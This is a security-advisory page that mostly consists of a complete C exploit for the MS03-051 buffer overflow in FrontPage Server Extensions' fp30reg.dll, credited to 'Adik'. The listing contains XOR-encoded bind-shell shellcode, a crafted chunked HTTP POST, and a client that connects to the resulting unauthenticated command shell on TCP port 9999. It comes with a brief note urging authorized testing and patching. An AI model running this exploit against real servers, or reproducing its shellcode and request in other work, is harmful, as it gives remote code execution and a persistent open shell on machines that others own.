Microsoft FrontPage Server Extensions Buffer Overflow (fp30reg.dll)

Summary

As we reported in our previous article, Buffer Overrun in Microsoft FrontPage Server Extensions Could Allow Code Execution (MS03-051), a vulnerability in FrontPage Server Extensions' fp30reg.dll allows remote attackers to make the server execute arbitrary code. The following exploit code can be used to test your own systems for the vulnerability. Be aware of what it does: a successful run leaves a persistent command shell listening on TCP port 9999 of the target for anyone who can reach that port, and the return addresses in the code are hard-coded for fp30reg.dll 4.0.2.5526 on Windows 2000 Professional SP3 (English), so other builds are unlikely to behave as described. Run it only against systems you are authorized to test, and apply the MS03-051 update to fix the underlying flaw.

Credit:

The information has been provided by Adik.


Details

Exploit:
/*******************************************************************************

Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore

Exploit by Adik netmaniac hotmail kg

Binds persistent command shell on port 9999
Tested on
    Windows 2000 Professional SP3 English version
    (fp30reg.dll ver 4.0.2.5526)

-[ 13/Nov/2003 ]-
********************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

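/* Exploit version string printed in the banner (the listing had lost its quotes). */
#define VER "0.1"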

/*
 * Bind-shell payload sent in the request body (484 bytes).
 *
 * The first 27 bytes disassemble to a self-locating decoder: a jmp/call pair
 * recovers its own address, eax is advanced 0x11 bytes past it, and a
 * "xor byte ptr [eax],0x88 / inc eax / loop" runs over the next 0x1C9 (457)
 * bytes before execution falls through into the decoded code.  That is why
 * 0x88 is so frequent below -- it is an encoded 0x00 -- and keeping 0x00 out
 * of the buffer matters because main() measures the payload with strlen().
 *
 * Per the header comment the decoded code listens on TCP 9999 and hands a
 * persistent command shell to whoever connects; nothing in this listing
 * suggests any authentication on that port.  Beyond that the bytes are
 * opaque machine code -- treat them as such and run them only on systems
 * you are authorized to test.
 */
unsigned char kyrgyz_bind_code[] = {
  /* decoder stub (27 bytes) */
  0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
  0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
  /* XOR-0x88 encoded payload (457 bytes) */
  0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
  0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
  0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
  0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
  0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
  0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
  0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
  0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
  0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
  0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
  0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
  0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
  0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
  0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
  0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
  0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
  0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
  0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
  0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
  0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
  0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
  0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

/* Forward declarations; both functions are defined after main(). */
void cmdshell (int sock);        /* relay console <-> connected shell socket; calls WSACleanup() before returning */
long gimmeip(char *hostname);    /* dotted quad or DNS name -> network-order IPv4 address; exits the process on failure */

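/* Sizes and constants shared by the request builder and main(). */
enum {
    DATA_LEN   = 1500,   /* payload buffer size, as in the original */
    PACKET_LEN = 3000,   /* whole HTTP request */
    SHELL_PORT = 9999,   /* port the bind shellcode listens on (header comment) */
    WAIT_MS    = 13000   /* grace period before connecting back to the shell */
};

/*
 * Values planted in the NOP sled.  The addresses are taken verbatim from the
 * original exploit and, per its header comment, are for fp30reg.dll
 * 4.0.2.5526 on Windows 2000 Professional SP3 English only; any other build
 * needs different values.
 */
static const unsigned char g_ecx[]      = { 0xe0, 0xf3, 0xd4, 0x67 }; /* 0x67d4f3e0, little-endian */
static const unsigned char g_edi[]      = { 0xff, 0xd0, 0x90, 0x90 }; /* x86 "call eax" followed by two NOPs */
static const unsigned char g_call[]     = { 0xe4, 0xf3, 0xd4, 0x67 }; /* 0x67d4f3e4: "overwrite .data section of fp30reg.dll" (original comment) */
static const unsigned char g_shortjmp[] = { 0xeb, 0x10 };             /* x86 "jmp short +0x10" */

/*
 * Build the payload: a 0x90 sled with the overwrite values and the bind
 * shellcode at the original's fixed offsets, NUL-terminated so it can be
 * measured with strlen().  Nothing copied in contains a 0x00 byte, so the
 * length is always DATA_LEN - 1.
 */
static void fill_payload(unsigned char *data)
{
    memset(data, 0x90, DATA_LEN - 1);
    data[DATA_LEN - 1] = '\0';
    memcpy(data + 16, g_edi, sizeof g_edi);
    memcpy(data + 20, g_ecx, sizeof g_ecx);
    memcpy(data + 250 + 10, g_shortjmp, sizeof g_shortjmp);
    memcpy(data + 250 + 14, g_call, sizeof g_call);
    /* 484 bytes ending at offset 804, well inside the sled */
    memcpy(data + 250 + 70, kyrgyz_bind_code, sizeof kyrgyz_bind_code);
}

/*
 * Format the HTTP request into packet (capacity cap).  As in the original,
 * the request carries both Content-Length and Transfer-Encoding: chunked,
 * with the payload sent as a single chunk.  Returns the request length, or
 * -1 if the host name is so long that the request would not fit.  The
 * original used an unbounded sprintf() here and passed packet as its own
 * %s argument, which is undefined behaviour as well as an overflow risk.
 */
static int build_request(char *packet, size_t cap, const char *host,
                         const unsigned char *data)
{
    unsigned dlen = (unsigned)strlen((const char *)data);
    int n = snprintf(packet, cap,
                     "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"
                     "Host: %s\r\n"
                     "Transfer-Encoding: chunked\r\n"
                     "Content-Length: %u\r\n\r\n"
                     "%x\r\n%s\r\n0\r\n\r\n",
                     host, dlen, dlen, (const char *)data);
    if (n < 0 || (size_t)n >= cap)
        return -1;
    return n;
}

/* Print msg, release the socket (if any) and Winsock, and yield exit status 1. */
static int fail(SOCKET sock, const char *msg)
{
    printf("%s", msg);
    if (sock != INVALID_SOCKET)
        closesocket(sock);
    WSACleanup();
    return 1;
}

/*
 * Entry point.  argv[1] is the target host (name or IPv4 address), argv[2]
 * an optional TCP port (default 80).  Sends the crafted request, treats a
 * "100" status reply as confirmation that fp30reg.dll answered, waits
 * WAIT_MS for the shellcode to start, then connects to SHELL_PORT and hands
 * the socket to cmdshell().  Returns 0 when the shell session ends, 1 on
 * any error.
 *
 * A successful run leaves a persistent command shell on TCP 9999 of the
 * target (see the header comment); nothing in this listing suggests that
 * port is authenticated in any way.
 */
int main(int argc, char *argv[])
{
    WSADATA wsa;
    struct sockaddr_in target;
    SOCKET sock;
    unsigned short port = 80;
    long ip;
    unsigned char data[DATA_LEN];
    char packet[PACKET_LEN];
    int len, got, waited;

    printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
           " by Adik < netmaniac [at] hotmail.KG >\n\n", VER);
    if (argc < 2) {
        printf(" Usage: %s [Target] <port>\n"
               " eg: fp30reg.exe 192.168.63.130\n\n", argv[0]);
        return 1;
    }
    if (argc == 3) {
        /* strtol rather than atoi: a non-numeric or out-of-range port is
         * rejected instead of silently becoming 0 or being truncated. */
        char *end;
        long p = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || p < 1 || p > 65535) {
            printf("[x] Invalid port: %s\n", argv[2]);
            return 1;
        }
        port = (unsigned short)p;
    }
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("[x] WSAStartup failed! Exiting...\n");
        return 1;
    }
    printf("[*] Target:\t%s \tPort: %d\n\n", argv[1], port);
    ip = gimmeip(argv[1]);   /* exits the process itself if the name does not resolve */

    fill_payload(data);
    len = build_request(packet, sizeof packet, argv[1], data);
    if (len < 0)
        return fail(INVALID_SOCKET, "[x] Target name too long! Exiting...\n");

    memset(&target, 0, sizeof target);
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = (u_long)ip;
    target.sin_port = htons(port);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
        return fail(INVALID_SOCKET, "[x] Socket not initialized! Exiting...\n");
    printf("[*] Socket initialized...\n");
    if (connect(sock, (struct sockaddr *)&target, sizeof target) != 0)
        return fail(sock, "[*] Connection to host failed! Exiting...\n");

    printf("[*] Checking for presence of fp30reg.dll...");
    if (send(sock, packet, len, 0) == SOCKET_ERROR)
        return fail(sock, "[x] Failed to inject packet! Exiting...\n");

    memset(packet, 0, sizeof packet);
    got = recv(sock, packet, (int)sizeof packet, 0);
    if (got == SOCKET_ERROR)
        return fail(sock, "[x] Failed to receive packet! Exiting...\n");
    /* The original keyed on the status code "100" ("HTTP/1.1 100 ...", code
     * at offset 9 of the status line).  Check the length first so a short
     * reply cannot be misread. */
    if (got < 12 || memcmp(packet + 9, "100", 3) != 0)
        return fail(sock, " Not Found!! Exiting...\n");
    printf(" Found!\n");
    printf("[*] Packet injected!\n");
    closesocket(sock);

    printf("[*] Sleeping ");
    for (waited = 0; waited < WAIT_MS; waited += 1000) {
        printf(". ");
        fflush(stdout);
        Sleep(1000);
    }

    printf("\n[*] Connecting to host: %s on port %d", argv[1], SHELL_PORT);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
        return fail(INVALID_SOCKET, "\n[x] Socket not initialized! Exiting...\n");
    target.sin_port = htons(SHELL_PORT);   /* family and address unchanged */
    if (connect(sock, (struct sockaddr *)&target, sizeof target) != 0)
        return fail(sock, "\n[x] Exploit failed or there is a Firewall! Exiting...\n");
    printf("\n[*] Dropping to shell...\n\n");
    cmdshell((int)sock);   /* returns when the session ends; it calls WSACleanup() itself */
    return 0;
}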
/*********************************************************************************/
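/*
 * Relay loop between the local console and the connected remote shell.
 * Polls the socket with a one-second select(); when it is readable, copies
 * whatever arrived to stdout, otherwise blocks reading stdin and sends that
 * to the socket.  Returns after WSACleanup() once either side closes or an
 * I/O call fails.  sock is the connected socket, as an int to match the
 * prototype above.
 */
void cmdshell (int sock)
{
    SOCKET s = (SOCKET)sock;
    char buf[1000];

    for (;;) {
        fd_set readable;
        struct timeval tv;
        int rc;

        /* Use the Winsock macros instead of hand-laying an fd_set out as
         * unsigned long[2]: SOCKET is 64 bits on Win64, so the old trick
         * stores the descriptor in the wrong place there. */
        FD_ZERO(&readable);
        FD_SET(s, &readable);
        tv.tv_sec = 1;
        tv.tv_usec = 0;

        rc = select(0, &readable, NULL, NULL, &tv);
        if (rc == SOCKET_ERROR) {
            /* The original fell through to a blocking stdin read here. */
            printf("[x] select() failed.\n");
            break;
        }
        if (rc == 1) {
            int got = recv(s, buf, (int)sizeof buf, 0);
            if (got <= 0) {
                printf("[x] Connection closed.\n");
                break;
            }
            if (_write(1, buf, (unsigned)got) <= 0) {
                printf("[x] Connection closed.\n");
                break;
            }
        } else {
            int got = _read(0, buf, (unsigned)sizeof buf);
            if (got <= 0) {
                printf("[x] Connection closed.\n");
                break;
            }
            if (send(s, buf, got, 0) <= 0) {
                printf("[x] Connection closed.\n");
                break;
            }
        }
    }
    WSACleanup();
}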
/*********************************************************************************/
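/*
 * Resolve hostname -- a dotted quad or a DNS name -- to an IPv4 address in
 * network byte order, returned as a long because that is the interface the
 * caller expects.  On failure it prints a message, calls WSACleanup() and
 * exits the process with status 1; it never returns an error to the caller.
 */
long gimmeip(char *hostname)
{
    unsigned long addr = inet_addr(hostname);

    /* inet_addr() reports a parse failure as the unsigned INADDR_NONE; the
     * original's "< 0" test only worked because it stored the result in a
     * signed long.  (255.255.255.255 is indistinguishable from that error
     * and will be looked up as a name, as before.) */
    if (addr == INADDR_NONE) {
        struct hostent *he = gethostbyname(hostname);
        /* Only accept an AF_INET entry whose address is exactly 4 bytes:
         * the original memcpy'd h_length bytes into the long unchecked. */
        if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL
            || he->h_length != (int)sizeof addr) {
            printf("[x] Failed to resolve host: %s! Exiting...\n\n", hostname);
            WSACleanup();
            exit(1);
        }
        memcpy(&addr, he->h_addr_list[0], sizeof addr);
    }
    return (long)addr;
}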
/*********************************************************************************/
